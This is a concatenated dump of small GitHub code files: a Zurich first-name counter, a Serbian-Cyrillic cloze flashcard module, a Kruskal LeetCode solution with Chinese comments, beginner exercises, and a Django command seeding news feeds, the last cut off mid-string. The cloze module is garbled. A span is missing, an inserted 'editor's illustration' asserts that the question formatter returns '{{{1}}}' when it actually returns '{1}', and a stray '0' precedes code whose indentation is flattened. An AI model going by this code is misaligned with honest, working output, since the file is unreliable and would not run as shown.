+{"seq_id":"40334413138","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 22 16:55:57 2022\n\n@author: rene.degen@inodes.ch\n\nTask:\nThe file \"BEV370OD3700.csv\" contains \"all first names of newborns residing in the city of Zurich since 1993, aggregated by sex and year of birth.\"\n\nPrint the 10 most frequent first names of the year 2020.\n\nThis solution uses the csv module and the collections module.\n\"\"\"\n\nimport collections\nimport csv\n\nquelle = 'BEV370OD3700.csv'\nlimite = 10\nauswahljahr = '2020'\n\nanzahl_namen = collections.Counter()\n\nwith open(quelle, newline='', encoding='utf-8-sig') as csvdatei:\n    reader = csv.DictReader(csvdatei)\n    for eintrag in filter(lambda x: auswahljahr == None or auswahljahr == x['StichtagDatJahr'], \\\n                          reader):\n        name = eintrag['Vorname']\n        anzahl = int(eintrag['AnzGebuWir'])\n        anzahl_namen[name] += anzahl\n\nfor n in anzahl_namen.most_common(limite):\n    print(*n)","repo_name":"wunnox/python_advanced","sub_path":"Musterloesungen/vornamencsvcoll.py","file_name":"vornamencsvcoll.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"6123547206","text":"import re\nfrom наки import tsv\nfrom collections import namedtuple\n\n\nИзвор = namedtuple('Извор', ['ид', 'датум', 'цлозе'])\n\n\nЦЛОЗЕ_ПРОГ = re.compile('[{][^:]*:[^}]*[}]')\nЦЛОЗЕ_ПИТАЊЕ = re.compile('[{]([^:]*):[^}]*[}]')\nЦЛОЗЕ_ОДГОВОР = re.compile('[{][^:]*:([^}]*)[}]')\n\n\nclass ЦлозеГрешка(ValueError):\n    pass\n\n\ndef формат_уклони_болд(текст):\n    текст = текст.replace('[[', 'ДУПЛЕ_КОЦКАСТЕ_ЛЕВЕ').replace(']]', 'ДУПЛЕ_КОЦКАСТЕ_ДЕСНЕ')\n    текст = текст.replace('[', '').replace(']', '')\n    текст = текст.replace('ДУПЛЕ_КОЦКАСТЕ_ЛЕВЕ', '[[').replace('ДУПЛЕ_КОЦКАСТЕ_ДЕСНЕ', ']]')\n    return текст\n\n\ndef формат_цлозе_питање(текст):\n    променљиве = ЦЛОЗЕ_ПРОГ.findall(текст)\n    if not променљиве:\n        raise ЦлозеГрешка(f'Текст нема Цлозе променљивих: {текст}')\n    питања = ['{{{' + ЦЛОЗЕ_ПИТАЊЕ.match(п).group(1) + '}}}' for п in променљиве]\n    формат = ЦЛОЗЕ_ПРОГ.subn('{}', текст)[0]\n    текст = формат.format(*питања)\n    текст = формат_уклони_болд(текст)\n    return текст\n\n\ndef формат_цлозе_одговор(текст):\n    променљиве = ЦЛОЗЕ_ПРОГ.findall(текст)\n    if not променљиве:\n        raise ЦлозеГрешка(f'Текст нема Цлозе променљивих: {текст}')\n    одговори = ['{' + ЦЛОЗЕ_ОДГОВОР.match(п).group(1) + '}' for п in променљиве]\n    формат = ЦЛОЗЕ_ПРОГ.subn('{}', текст)[0]\n    текст = формат.format(*одговори)\n    текст = текст.replace('{} ', '').replace('{}', '')\n    return текст\n
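\n# --- added check (editor's illustration; the sample Moodle-style cloze string is made up).\n# It shows the two transformations: the question form keeps only the variable number in\n# triple braces, while the answer form keeps the part after the first colon. ---\nassert формат_цлозе_питање('Cloze: {1:SA:=answer} end') == 'Cloze: {{{1}}} end'\nassert формат_цлозе_одговор('Cloze: {1:SA:=answer} end') == 'Cloze: {SA:=answer} end'\n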
0\n def питање(џ):\n return формат_цлозе_питање(џ.цлозе)\n\n def одговор(џ):\n return формат_цлозе_одговор(џ.цлозе)\n\n карте.extend(кг(\"ЦЛОЗЕ\", питање, одговор))\n return карте, []\n\n\ndef извор_учитај(путања):\n return tsv.Табела(путања, tsv.namedtuple(Извор)).учитај()\n\n","repo_name":"cohadar/naki","sub_path":"код/каталог/извори/de_cloze.py","file_name":"de_cloze.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24850918401","text":"\"\"\"\n给你一个points数组,表示 2D 平面上的一些点,其中points[i] = [xi, yi]。\n连接点[xi, yi] 和点[xj, yj]的费用为它们之间的 曼哈顿距离:|xi - xj| + |yi - yj|,其中|val|表示val的绝对值。\n请你返回将所有点连接的最小总费用。只有任意两点之间 有且仅有一条简单路径时,才认为所有点都已连接。\n\n示例 1:\n输入:points = [[0,0],[2,2],[3,10],[5,2],[7,0]]\n输出:20\n解释:\n\n我们可以按照上图所示连接所有点得到最小总费用,总费用为 20 。\n注意到任意两个点之间只有唯一一条路径互相到达。\n\n示例 2:\n输入:points = [[3,12],[-2,5],[-4,1]]\n输出:18\n\n示例 3:\n输入:points = [[0,0],[1,1],[1,0],[-1,1]]\n输出:4\n\n示例 4:\n输入:points = [[-1000000,-1000000],[1000000,1000000]]\n输出:4000000\n\n示例 5:\n输入:points = [[0,0]]\n输出:0\n\n提示:\n\n1 <= points.length <= 1000\n-10^6 <= xi, yi <= 10^6\n所有点(xi, yi)两两不同。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/min-cost-to-connect-all-points\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\n\n\nclass UnionSet:\n def __init__(self, n):\n self.n = n\n self.rank = [1] * n\n self.f = [i for i in range(n)]\n\n def find(self, x):\n if self.f[x] == x:\n return x\n self.f[x] = self.find(self.f[x])\n return self.f[x]\n\n def union(self, x, y):\n root_x = self.find(x)\n root_y = self.find(y)\n if root_x == root_y:\n return False\n\n if self.rank[root_x] < self.rank[root_y]:\n root_x, root_y = root_y, root_x\n\n self.rank[root_x] += self.rank[root_y]\n self.f[root_y] = root_x\n return True\n\n\nclass Solution:\n def minCostConnectPoints(self, points: List[List[int]]) -> int:\n \"\"\"\n 根据题意,我们得到了一张 n 个节点的完全图,任意两点之间的距离均为它们的曼哈顿距离。\n 现在我们需要在这个图中取得一个子图,恰满足子图的任意两点之间有且仅有一条简单路径,\n 且这个子图的所有边的总权值之和尽可能小。\n\n 能够满足任意两点之间有且仅有一条简单路径只有树,且这棵树包含 n 个节点。\n 我们称这棵树为给定的图的生成树,其中总权值最小的生成树,我们称其为最小生成树。\n\n 最小生成树有一个非常经典的解法:Kruskal。\n\n 方法一:Kruskal 算法\n 思路及解法\n Kruskal 算法是一种常见并且好写的最小生成树算法,由Kruskal 发明。\n 该算法的基本思想是从小到大加入边,是一个贪心算法。\n 其算法流程为:\n 将图G={V,E} 中的所有边按照长度由小到大进行排序,等长的边可以按任意顺序。\n 初始化图 G'为{V,∅},从前向后扫描排序后的边,如果扫描到的边 e 在 G'中连接了两个相异的连通块,则将它插入 G'中。\n\n 最后得到的图 G'就是图 G 的最小生成树。\n\n 在实际代码中,我们首先将这张完全图中的边全部提取到边集数组中,\n 然后对所有边进行排序,从小到大进行枚举,每次贪心选边加入答案。\n 使用并查集维护连通性,若当前边两端不连通即可选择这条边。\n\n 作者:LeetCode-Solution\n 链接:https://leetcode-cn.com/problems/min-cost-to-connect-all-points/solution/lian-jie-suo-you-dian-de-zui-xiao-fei-yo-kcx7/\n 来源:力扣(LeetCode)\n 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n \"\"\"\n dist = lambda x, y: abs(points[x][0] - points[y][0]) + abs(points[x][1] - points[y][1])\n\n n = len(points)\n dsu = UnionSet(n)\n edges = list()\n\n for i in range(n):\n for j in range(i + 1, n):\n edges.append((dist(i, j), i, j))\n\n edges.sort()\n\n ret, num = 0, 1\n for length, x, y in edges:\n if dsu.union(x, y):\n ret += length\n num += 1\n if num == n:\n break\n\n return ret\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.minCostConnectPoints([[0, 0], [2, 2], [3, 10], [5, 2], [7, 0]]))\n print(s.minCostConnectPoints([[-1000000, -1000000], [1000000, 1000000]]))\n","repo_name":"wanzhouyi/leetcode","sub_path":"1.数组和字符串/并查集/1584. 
连接所有点的最小费用.py","file_name":"1584. 连接所有点的最小费用.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"73401348053","text":"all_steps = 0\r\nsteps_on_way_home = 0\r\ncommand = input()\r\ngoal_reached = False\r\nwhile all_steps < 10000:\r\n if command != 'Going home':\r\n all_steps += int(command)\r\n else:\r\n steps_on_way_home = int(input())\r\n all_steps += steps_on_way_home\r\n break\r\n if all_steps >= 10000:\r\n goal_reached = True\r\n break\r\n command = input()\r\nif all_steps >= 10000:\r\n goal_reached = True\r\ndifference = abs(all_steps - 10000)\r\nif goal_reached:\r\n print(f\"Goal reached! Good job!\")\r\n print(f\"{difference} steps over the goal!\")\r\nelse:\r\n print(f\"{difference} more steps to reach goal.\")","repo_name":"Gattsu1337/Python-Basics","sub_path":"walking.py","file_name":"walking.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26641645953","text":"#! /usr/bin/python\n# -*- encoding: utf-8 -*-\n\n# 递归案例:传入一个参数n,计算1...n的累计求和\n\n\ndef sum_nums(num):\n \"\"\"\n 传入一个参数n,计算1...n的累计求和\n :param num: 传入的参数\n :return: 累计求和的结果\n \"\"\"\n # 递归出口\n if num == 1:\n return 1\n # 递归调用自己实现累计求和\n temp = sum_nums(num - 1)\n return temp + num\n\n\nresult = sum_nums(5)\nprint(\"1..5的和为:%d\" % result)\n","repo_name":"xiaoqiangjava/python_basic","sub_path":"basic/function/recursion_case.py","file_name":"recursion_case.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17649723913","text":"\"\"\"manage.py command add_default_feeds to add default data to database\"\"\"\nfrom django.core.management import BaseCommand\n\nfrom feeds.models import Feed, Publisher\nfrom preferences.models import Page\n\n\nclass Command(BaseCommand):\n \"\"\"command for manage.py\"\"\"\n\n # Show this when the user types help\n help = \"Adds StartUp default feeds\"\n\n def handle(self, *args, **options):\n \"\"\"adds default data to database\"\"\"\n initial_publishers = [\n {\n \"name\": \"Financial Times\",\n \"link\": \"https://www.ft.com\",\n \"renowned\": 3,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Tagesschau\",\n \"link\": \"https://www.tagesschau.de\",\n \"renowned\": 3,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"ZDF Heute\",\n \"link\": \"https://www.heute.de\",\n \"renowned\": 3,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"Redations Netzwerk Deutschland\",\n \"link\": \"https://www.rnd.de\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"FAZ\",\n \"link\": \"https://www.faz.net\",\n \"renowned\": 3,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"The Economist\",\n \"link\": \"http://www.economist.com\",\n \"renowned\": 3,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Harvard Business Review\",\n \"link\": \"https://hbr.org\",\n \"renowned\": 2,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Wall Street Journal\",\n \"link\": \"https://www.wsj.com/\",\n \"renowned\": 2,\n \"paywall\": \"Y\",\n 
\"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Al Jazeera\",\n \"link\": \"https://www.aljazeera.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"CNBC\",\n \"link\": \"https://www.cnbc.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Risk.net\",\n \"link\": \"https://www.risk.net\",\n \"renowned\": 1,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Hedge Week\",\n \"link\": \"https://www.hedgeweek.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Reuters\",\n \"link\": \"https://www.reuters.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Deutsche Welle\",\n \"link\": \"https://www.dw.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"title\",\n \"language\": \"en\",\n },\n {\n \"name\": \"n-tv.de\",\n \"link\": \"https://www.n-tv.de\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"Bloomberg\",\n \"link\": \"https://www.bloomberg.com\",\n \"renowned\": 2,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"BBC\",\n \"link\": \"https://www.bbc.com\",\n \"renowned\": 2,\n \"paywall\": \"N\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"The Trade\",\n \"link\": \"http://www.thetradenews.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"9to5mac.com\",\n \"link\": \"http://www.9to5mac.com\",\n \"renowned\": 2,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"TechCrunch\",\n \"link\": \"https://techcrunch.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"The Verge\",\n \"link\": \"http://www.theverge.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Medium\",\n \"link\": \"http://www.medium.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Google News\",\n \"link\": \"https://news.google.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Stuff Made Here\",\n \"link\": \"https://www.youtube.com/@StuffMadeHere\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Teulu Tribe\",\n \"link\": \"https://www.youtube.com/@TeuluTribe\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"BigThink\",\n \"link\": \"https://www.youtube.com/@bigthink\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"EconomicsExplained\",\n \"link\": \"https://www.youtube.com/@EconomicsExplained\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Wendover Productions\",\n \"link\": 
\"https://www.youtube.com/@Wendoverproductions\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"RealEngineering\",\n \"link\": \"https://www.youtube.com/@RealEngineering\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"TED\",\n \"link\": \"https://www.ted.com/\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Vox\",\n \"link\": \"https://www.vox.com/\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"TheNextWeb\",\n \"link\": \"https://www.thenextweb.com/\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n ]\n\n for publisher in initial_publishers:\n Publisher(**publisher).save()\n\n initial_feeds = [\n ########################### English News ###########################\n {\n \"name\": \"Home International\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/rss/home/international\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 4,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/markets?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 1,\n },\n {\n \"name\": \"News In Depth\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/news-in-depth?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;News In Depth\",\n \"importance\": 2,\n },\n {\n \"name\": \"The Big Read\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/the-big-read?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;The Big Read\",\n \"importance\": 2,\n },\n {\n \"name\": \"Country US\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/us?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;usa\",\n \"importance\": 0,\n },\n {\n \"name\": \"Country UK\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/world-uk?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;uk\",\n \"importance\": 0,\n },\n {\n \"name\": \"Region Europe\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/europe?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;europe\",\n \"importance\": 0,\n },\n {\n \"name\": \"Top News\",\n \"publisher\": Publisher.objects.get(name=\"CNBC\"),\n \"url\": \"https://search.cnbc.com/rs/search/combinedcms/view.xml?partnerId=wrss01&id=100003114\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 1,\n },\n {\n \"name\": \"Markets\",\n 
\"publisher\": Publisher.objects.get(name=\"CNBC\"),\n \"url\": \"https://search.cnbc.com/rs/search/combinedcms/view.xml?partnerId=wrss01&id=20910258\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 1,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"Reuters\"),\n \"url\": (\n \"http://FEED-CREATOR.local/extract.php?url=https%3A%2F%2Fwww.reuters.com%2Fmarkets%2F&\"\n \"in_id_or_class=content-layout__item__SC_GG&max=19&order=document&guid=0&strip_if_url%5B0%5D=\"\n \"author&strip=.label__label__f9Hew%2C.events__data__18XBG%2C.media-story-card__placement-\"\n \"container__1R55-%2C.topic__header__3T_p2&keep_qs_params=\"\n ),\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 0,\n },\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"Risk.net\"),\n \"url\": \"http://www.risk.net/feeds/rss/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 0,\n },\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"Al Jazeera\"),\n \"url\": \"https://www.aljazeera.com/xml/rss/all.xml\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 2,\n },\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"Deutsche Welle\"),\n \"url\": \"http://rss.dw.com/rdf/rss-en-all\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 1,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://feeds.bloomberg.com/markets/news.rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 3,\n },\n {\n \"name\": \"Politics\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://feeds.bloomberg.com/politics/news.rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"frontpage;politics\",\n \"importance\": 1,\n },\n {\n \"name\": \"Top News\",\n \"publisher\": Publisher.objects.get(name=\"The Economist\"),\n \"url\": (\n \"http://FEED-CREATOR.local/mergefeeds.php?url%5B0%5D=https%3A%2F%2Fwww.economist.com%2F\"\n \"briefing%2Frss.xml&url%5B1%5D=https%3A%2F%2Fwww.economist.com%2Ffinance-and-economics%2F\"\n \"rss.xml&max=5&order=date\"\n ),\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;magazine\",\n \"importance\": 1,\n },\n {\n \"name\": \"Countries\",\n \"publisher\": Publisher.objects.get(name=\"The Economist\"),\n \"url\": (\n \"http://FEED-CREATOR.local/mergefeeds.php?url%5B0%5D=https%3A%2F%2Fwww.economist.com%2F\"\n \"europe%2Frss.xml&url%5B1%5D=https%3A%2F%2Fwww.economist.com%2Finternational%2Frss.xml&\"\n \"url%5B2%5D=https%3A%2F%2Fwww.economist.com%2Funited-states%2Frss.xml&url%5B3%5D=\"\n \"https%3A%2F%2Fwww.economist.com%2Fthe-americas%2Frss.xml&url%5B4%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fmiddle-east-and-africa%2Frss.xml&url%5B5%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fasia%2Frss.xml&url%5B6%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fchina%2Frss.xml&url%5B7%5D=https%3A%2F%2F\"\n 
\"www.economist.com%2Fbritain%2Frss.xml&max=12&order=date\"\n ),\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;magazine;world\",\n \"importance\": 0,\n },\n ########################### Fund News ###########################\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"The Trade\"),\n \"url\": \"https://www.thetradenews.com/feed/\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;funds;sidebar\",\n \"importance\": 1,\n },\n {\n \"name\": \"Latest\",\n \"publisher\": Publisher.objects.get(name=\"Hedge Week\"),\n \"url\": \"https://www.hedgeweek.com/feed/\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"hedge funds;funds;sidebar\",\n \"importance\": 3,\n },\n {\n \"name\": 'Search \"Hedge Funds\"',\n \"publisher\": Publisher.objects.get(name=\"Google News\"),\n \"url\": \"https://news.google.com/rss/search?q=hedge+fund\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"google news;hedge funds;funds;sidebar\",\n \"importance\": 0,\n },\n ########################### German News ###########################\n {\n \"name\": \"Startseite\",\n \"publisher\": Publisher.objects.get(name=\"Tagesschau\"),\n \"url\": \"https://www.tagesschau.de/index~rss2.xml\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"startseite\",\n \"importance\": 2,\n },\n {\n \"name\": \"Startseite\",\n \"publisher\": Publisher.objects.get(name=\"FAZ\"),\n \"url\": \"https://www.faz.net/rss/aktuell/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"startseite\",\n \"importance\": 1,\n },\n {\n \"name\": \"Startseite\",\n \"publisher\": Publisher.objects.get(name=\"ZDF Heute\"),\n \"url\": \"https://www.zdf.de/rss/zdf/nachrichten\",\n \"active\": False,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"startseite\",\n \"importance\": 2,\n },\n {\n \"name\": \"Wirtschaft\",\n \"publisher\": Publisher.objects.get(name=\"n-tv.de\"),\n \"url\": \"https://www.n-tv.de/wirtschaft/rss\",\n \"active\": False,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"wirtschaft\",\n \"importance\": 1,\n },\n {\n \"name\": \"Politik\",\n \"publisher\": Publisher.objects.get(name=\"n-tv.de\"),\n \"url\": \"https://www.n-tv.de/politik/rss\",\n \"active\": False,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"politik\",\n \"importance\": 1,\n },\n {\n \"name\": \"Politik\",\n \"publisher\": Publisher.objects.get(\n name=\"Redations Netzwerk Deutschland\"\n ),\n \"url\": \"https://www.rnd.de/arc/outboundfeeds/rss/category/politik/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"wirtschaft\",\n \"importance\": 1,\n },\n {\n \"name\": \"Wirtschaft\",\n \"publisher\": Publisher.objects.get(\n name=\"Redations Netzwerk Deutschland\"\n ),\n \"url\": \"https://www.rnd.de/arc/outboundfeeds/rss/category/wirtschaft/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"politik\",\n \"importance\": 1,\n },\n ########################### Tech News ###########################\n {\n \"name\": \"Technology\",\n \"publisher\": 
Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://feeds.bloomberg.com/technology/news.rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"tech\",\n \"importance\": 0,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"9to5mac.com\"),\n \"url\": \"http://9to5mac.com/feed/\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"TechCrunch\"),\n \"url\": \"http://feeds.feedburner.com/Techcrunch\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"The Verge\"),\n \"url\": \"http://www.theverge.com/rss/full.xml\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"TheNextWeb\"),\n \"url\": \"https://thenextweb.com/feed\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"#Python\",\n \"publisher\": Publisher.objects.get(name=\"Medium\"),\n \"url\": \"https://medium.com/feed/tag/python\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"tech\",\n \"importance\": 0,\n },\n ########################### YouTube Channels ###########################\n {\n \"name\": \"Originals - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://www.youtube.com/Bloomberg\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"Quicktake - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://www.youtube.com/@BloombergQuicktake\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.youtube.com/@FinancialTimes\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"The 